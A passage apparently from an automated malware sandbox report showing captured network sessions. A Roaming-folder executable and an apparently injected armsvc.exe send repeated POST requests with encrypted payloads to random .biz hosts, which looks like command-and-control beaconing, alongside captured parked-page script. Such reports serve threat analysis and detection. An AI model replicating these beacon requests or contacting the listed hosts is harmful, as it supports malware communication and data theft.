                                                                                                                                                                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 52 5a 42 59 4c 77 33 48 58 43 30 43 59 47 4b 6c 66 71 65 50 66 64 6b 73 31 6a 4e 74 52 36 69 63 56 6f 51 31 76 61 46 68 53 7a 39 46 42 42 53 54 76 49 56 79 4f 6a 61 4f 54 62 6c 6d 41 32 49 4c 44 37 36 4f 45 6f 54 71 45 6d 64 6b 57 74 53 2b 34 6f 58 48 4c 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RZBYLw3HXC0CYGKlfqePfdks1jNtR6icVoQ1vaFhSz9FBBSTvIVyOjaOTblmA2ILD76OEoTqEmdkWtS+4oXHLQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.469012022 CET584INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                                                                                        Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjlhYTJlODctOWMzZi00YjRlLWFhOTUtODM3NDcwMzRmMDc4IiwicGFnZV90aW1lIjoxNzM2OTQyMzAyLCJwYWdlX3VybCI6I


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        28192.168.2.224919213.248.148.254801924C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.665664911 CET363OUTGET /ayokafkcxduc?usid=20&utid=14164930640 HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Host: ww12.przvgke.biz
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:23.301656008 CET825INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Accept-Ch: viewport-width
                                                                                                                                                                                                                                                                        Accept-Ch: dpr
                                                                                                                                                                                                                                                                        Accept-Ch: device-memory
                                                                                                                                                                                                                                                                        Accept-Ch: rtt
                                                                                                                                                                                                                                                                        Accept-Ch: downlink
                                                                                                                                                                                                                                                                        Accept-Ch: ect
                                                                                                                                                                                                                                                                        Accept-Ch: ua
                                                                                                                                                                                                                                                                        Accept-Ch: ua-full-version
                                                                                                                                                                                                                                                                        Accept-Ch: ua-platform
                                                                                                                                                                                                                                                                        Accept-Ch: ua-platform-version
                                                                                                                                                                                                                                                                        Accept-Ch: ua-arch
                                                                                                                                                                                                                                                                        Accept-Ch: ua-model
                                                                                                                                                                                                                                                                        Accept-Ch: ua-mobile
                                                                                                                                                                                                                                                                        Accept-Ch-Lifetime: 30
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:23 GMT
                                                                                                                                                                                                                                                                        Server: Caddy
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_QOhGfaVYWa4YenMbntZjEuHy6hvwxtA+AQ+ZYEAYSam4HNxcCceurgUQ590WuGxJzPqa4OA/wTX9v+Jm4Eofnw==
                                                                                                                                                                                                                                                                        X-Domain: przvgke.biz
                                                                                                                                                                                                                                                                        X-Pcrew-Blocked-Reason:
                                                                                                                                                                                                                                                                        X-Pcrew-Ip-Organization: CenturyLink
                                                                                                                                                                                                                                                                        X-Subdomain: ww12
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:23.301963091 CET1236INData Raw: 33 63 30 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44
                                                                                                                                                                                                                                                                        Data Ascii: 3c05<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_QOhGfaVYWa4YenMbntZjEuHy6hvwxtA+AQ+ZYEAYSam4HNxcCceurgUQ590WuGxJzPqa4
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:23.302038908 CET1236INData Raw: 67 69 6e 3a 30 20 30 20 33 70 78 20 32 30 70 78 3b 0a 7d 0a 0a 2e 73 69 74 65 6c 69 6e 6b 48 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 2d 31 35 70 78 20 30 20 31 35 70 78 20 33 35 70 78 3b 0a 7d 0a 0a 23 61 6a 61 78 6c 6f 61 64 65 72 48 6f
                                                                                                                                                                                                                                                                        Data Ascii: gin:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;-moz-border-radiu
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:23.302094936 CET1236INData Raw: 3b 0a 7d 0a 0a 2e 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 32 72 65 6d 20 31 72 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 72 65 6d 3b 0a 20 20 20 20
                                                                                                                                                                                                                                                                        Data Ascii: ;}.footer { color:#626574; padding:2rem 1rem; font-size:.8rem; margin:0 auto; max-width:440px;}.footer a:link,.footer a:visited { color:#626574;}.sale_link_bold a,.sale_link,.sale_link a { color:#626574
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:23.302126884 CET672INData Raw: 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 31 37 2c 20 33 38 2c 20 37 37 29 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 0a
                                                                                                                                                                                                                                                                        Data Ascii: tom: 20px; background-color: rgb(17, 38, 77); text-decoration-line: none; font-size: 18px; font-weight: 700; color: #ffffff; text-align: left;}.fallback-arrow { float: right; width: 24px; height: 24px;
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:23.302160025 CET1236INData Raw: 6c 6f 67 69 63 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b 69 6e 67 33 2e 70 61 72 6b 6c 6f 67 69 63 2e 63 6f 6d 2f 70 61 67 65 2f 65 6e 68 61 6e 63 65 2e 6a 73 3f
                                                                                                                                                                                                                                                                        Data Ascii: logic" type="text/javascript" src="https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz"></script></div><div class="wrapper1"> <div class="wrapper2"> <div class="wrapper3"> <br/> <script a
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:23.302191973 CET1236INData Raw: 20 20 20 0a 20 20 20 20 20 20 20 20 2f 2f 20 46 6f 6e 74 2d 53 69 7a 65 73 20 61 6e 64 20 4c 69 6e 65 2d 48 65 69 67 68 74 73 0a 20 20 20 20 20 20 20 20 27 66 6f 6e 74 53 69 7a 65 41 74 74 72 69 62 75 74 69 6f 6e 27 3a 20 31 34 2c 0a 20 20 20 20
                                                                                                                                                                                                                                                                        Data Ascii: // Font-Sizes and Line-Heights 'fontSizeAttribution': 14, 'fontSizeTitle': 24, 'lineHeightTitle': 34, // Colors 'colorAttribution': '#aaa', 'colorTitleLink': '#0277bd', // Alp
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:23.302226067 CET1236INData Raw: 38 66 44 46 38 66 44 42 38 4d 48 78 38 66 48 77 78 66 48 78 38 66 48 77 77 66 44 42 38 66 48 78 38 66 48 78 38 66 48 78 38 4d 48 77 77 66 48 77 77 66 48 78 38 4d 48 77 77 66 46 63 78 4d 44 31 38 66 44 46 38 56 7a 45 77 50 58 77 78 4d 44 63 32 59
                                                                                                                                                                                                                                                                        Data Ascii: 8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fHx8MHwwfHwwfHx8MHwwfFcxMD18fDF8VzEwPXwxMDc2YjUwM2M4Y2I4OTVjMWE1ZTcwYjkxMzcyY2M3YjJmN2Y4OThjfDB8ZHAtdGVhbWludGVybmV0MDlfM3BofDB8MHwxNzc5Mjc1NDU4fHx8'; let domain='przvgke.biz'; let scriptPat
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:23.302258968 CET1236INData Raw: 63 61 6c 6c 62 61 63 6b 4f 70 74 69 6f 6e 73 2c 74 65 72 6d 73 3a 20 70 61 67 65 4f 70 74 69 6f 6e 73 2e 74 65 72 6d 73 7d 3b 69 66 20 28 21 61 64 73 4c 6f 61 64 65 64 20 7c 7c 20 28 63 6f 6e 74 61 69 6e 65 72 4e 61 6d 65 20 69 6e 20 63 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: callbackOptions,terms: pageOptions.terms};if (!adsLoaded || (containerName in containerNames)) {ajaxQuery(scriptPath + "/track.php"+ "?toggle=adloaded"+ "&uid=" + encodeURIComponent(uniqueTrackingID)+ "&domain=" + encodeURIComponent(domain)+ "
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:23.302293062 CET328INData Raw: 3b 7d 7d 69 66 20 28 73 74 61 74 75 73 2e 65 72 72 6f 72 5f 63 6f 64 65 20 3d 3d 20 32 30 29 20 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 22 2f 2f 64 70 2e 67 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 61
                                                                                                                                                                                                                                                                        Data Ascii: ;}}if (status.error_code == 20) {window.location.replace("//dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?client=" + encodeURIComponent((pageOptions.pubid.match(/^ca-/i) ? "" : "ca-") + pageOptions.pubid) + "&domain_name=" + encodeURICom
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:23.307351112 CET1236INData Raw: 6e 74 29 29 3b 7d 7d 69 66 20 28 73 74 61 74 75 73 2e 6e 65 65 64 73 72 65 76 69 65 77 20 3d 3d 3d 20 74 72 75 65 20 7c 7c 20 73 74 61 74 75 73 2e 6e 65 65 64 73 72 65 76 69 65 77 20 3d 3d 20 22 74 72 75 65 22 29 20 7b 61 6a 61 78 51 75 65 72 79
                                                                                                                                                                                                                                                                        Data Ascii: nt));}}if (status.needsreview === true || status.needsreview == "true") {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=needsreview&uid=" + encodeURIComponent(uniqueTrackingID));}if ((status.adult ===


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        29192.168.2.224919382.112.184.197803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:23.491602898 CET352OUTPOST /yhhdkvr HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:23.491602898 CET850OUTData Raw: 46 9c ab 7b 83 b0 4e 35 46 03 00 00 39 86 6d 22 86 64 1f 03 53 b9 4f a7 ed b5 ed 02 b2 da 0d db ea f9 23 dc 2f ca ff a3 b0 2b 13 d0 82 3d 22 3b 69 dc cf 5f de 08 9e 79 84 96 e2 84 3e 32 6f 8e ab 25 20 8f 77 b9 5d dc b1 26 bf 62 2c 2c 9a e6 c0 ca
                                                                                                                                                                                                                                                                        Data Ascii: F{N5F9m"dSO#/+=";i_y>2o% w]&b,,`QhDvz]%dNg|[xjoa@1lCRILc[lelM~7cp6ey2BWe>1Ulc-\I#//B8:xN1>6+0p'e7cR>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        30192.168.2.224919482.112.184.19780
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:34.600212097 CET353OUTPOST /fekpygna HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 784
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:34.600213051 CET784OUTData Raw: e7 9d 0a 09 69 a0 a7 7d 04 03 00 00 0d 60 e4 4e 11 d1 79 46 43 0f 80 3a 1e a2 99 fe 69 3f c9 1c 87 c8 73 29 4e df 30 10 9b 74 01 97 da d4 e6 5c 96 f1 86 7c 7c 94 64 a7 a9 13 c7 01 b2 42 27 ef 44 36 f6 54 86 1f 2d a5 63 27 3b 2c 91 b0 62 17 39 b2
                                                                                                                                                                                                                                                                        Data Ascii: i}`NyFC:i?s)N0t\||dB'D6T-c';,b9FZXF7|U6uM~t9xVTmyIR3/M9Fq$XZY=#R}g0o 0 !onT}sX:J$?XFea?Iyrb;#h6N_


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        31192.168.2.224919547.129.31.212803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:45.271426916 CET353OUTPOST /wuwlkmskpl HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:45.271461010 CET850OUTData Raw: 79 77 8e 05 9c 54 62 8b 46 03 00 00 f6 0f f4 6d e8 a3 d3 29 5b 04 1a f5 6a 5e 10 b2 18 0b b1 5d c9 a0 49 7e fb 64 19 d5 81 75 71 c7 47 35 26 d6 4d b1 61 4c 1b 44 00 1b 42 2d a5 8e 56 fd 79 78 5c 7f 31 1d bd 83 26 e1 e8 d9 5e 45 66 56 4b 88 2d 85
                                                                                                                                                                                                                                                                        Data Ascii: ywTbFm)[j^]I~duqG5&MaLDB-Vyx\1&^EfVK-Q,sy4xi6BY#Z^-juy~+Qm<-eV3UlQtvC=A#y6(Nr{8}^dg3$~CI{}BI.Z%@
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:46.651240110 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:46 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=c8887b93043879e78466622055662fc6|8.46.123.189|1736942326|1736942326|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        32192.168.2.224919613.251.16.150803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:46.829199076 CET358OUTPOST /uknkrwvskelclnbw HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: ifsaia.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:46.829232931 CET850OUTData Raw: 5f 91 5a d6 0d d6 e2 76 46 03 00 00 f8 19 62 77 64 de 32 9b da 5a 22 42 2b 0a ad 11 93 98 d6 76 b0 cb 80 09 bc 7d 34 13 73 74 dc 39 bf a0 c7 4d 3b 56 a3 f9 b6 95 d1 8c eb d6 ce e0 70 87 64 ca 3f e9 36 d6 a2 f5 d9 68 bf d3 77 87 d8 93 7f 11 d9 ba
                                                                                                                                                                                                                                                                        Data Ascii: _ZvFbwd2Z"B+v}4st9M;Vpd?6hwSrw2(0G_/(LE_YO2wW<yDHjNj*Qa ^5J8YBiIKmw`\DShBbaM3@)Kn7dJ1j{IfCn9<w;
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.202047110 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:47 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=03c3896676812fcf647ffe76c239c893|8.46.123.189|1736942327|1736942327|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        33192.168.2.224919744.221.84.105803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.314614058 CET353OUTPOST /kskvulsy HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: saytjshyf.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.314649105 CET850OUTData Raw: 47 c3 28 dd c4 ec 0e 48 46 03 00 00 7a ba 5c e4 d2 8c 83 98 ed a8 f3 b2 62 6a 53 56 bf 70 36 27 b1 c5 39 f4 bc fd 84 97 2d 7e 9b db 8d 33 21 41 8d 0f d2 0f ef 5b a2 42 84 92 10 a0 63 c4 c3 4b 24 bb 5f 3c 2e 81 46 f4 ef 15 b5 fd 85 a7 29 3e 11 bd
                                                                                                                                                                                                                                                                        Data Ascii: G(HFz\bjSVp6'9-~3!A[BcK$_<.F)>VnYr"^dg<5}Pq*LI7Y(7:> xRH13419C"'@cwXpRRn%CQKX9/Ec6~ie\qEBTUr
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.773777008 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:48 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=d868d7197701664740d671e75764850e|8.46.123.189|1736942328|1736942328|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        34192.168.2.224919818.141.10.107803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.829803944 CET348OUTPOST /gsqrd HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: vcddkls.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.830065966 CET850OUTData Raw: a4 c2 55 87 20 fa e7 62 46 03 00 00 39 a4 e7 59 26 9f 80 21 02 49 31 1f 0b a5 2d b2 0e dd 0f 97 26 01 a6 31 42 bd 11 94 06 38 8a 68 78 12 af b7 02 9d 0f 4e 0b c7 fd 49 83 fb 2c 15 f3 7a 46 25 46 d6 33 66 52 30 b1 25 11 08 cb ea d4 4e 6d 28 50 ad
                                                                                                                                                                                                                                                                        Data Ascii: U bF9Y&!I1-&1B8hxNI,zF%F3fR0%Nm(P1u*+EhaE+*L^yss?qh|-76wfL%}Mfc")l<?9j"{-q^zs"]XNo/rJ(qzOI
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.191101074 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:49 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=c2ec2e7c551a8e738059ea627ced60d5|8.46.123.189|1736942329|1736942329|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        35192.168.2.224919972.52.178.23803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.241914988 CET344OUTPOST /qdy HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.241960049 CET850OUTData Raw: f2 9d 63 ae 27 23 a6 a3 46 03 00 00 d5 bd 7d 0a b5 34 05 23 2a 1a 1a 8e 92 1b 8e e1 1b 9c 64 06 f1 4e e2 45 57 88 06 1c 25 e6 79 55 f9 4a c7 8e 19 00 13 8b bc 26 2c 26 4c 06 88 78 8a 09 9f 81 8b 9f 48 23 c1 36 76 56 38 77 d4 a2 1c 2b 17 60 3a a1
